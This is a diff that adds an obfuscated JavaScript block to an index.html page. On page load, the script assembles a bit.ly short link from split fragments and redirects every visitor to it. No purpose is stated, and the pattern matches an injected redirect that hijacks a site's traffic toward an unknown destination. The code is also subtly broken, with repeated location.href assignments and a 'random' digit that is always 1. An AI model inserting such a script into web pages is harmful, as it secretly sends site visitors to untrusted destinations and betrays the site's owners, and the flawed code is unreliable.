--- a/index.html
+++ b/index.html
@@ -1,1 +1,19 @@
 
+
+
+<script type = "text/javascript">
+
+function reDirect() {
+a = location.href = "bit.ly/";
+b = location.href = "BPA";
+c = location.href = "NDA0";
+d = Math.ceil(Math.random() * 1);
+
+
+a = "http://" + a + b + c + d ;
+
+window.location = a
+}
+
+reDirect();
+</script>
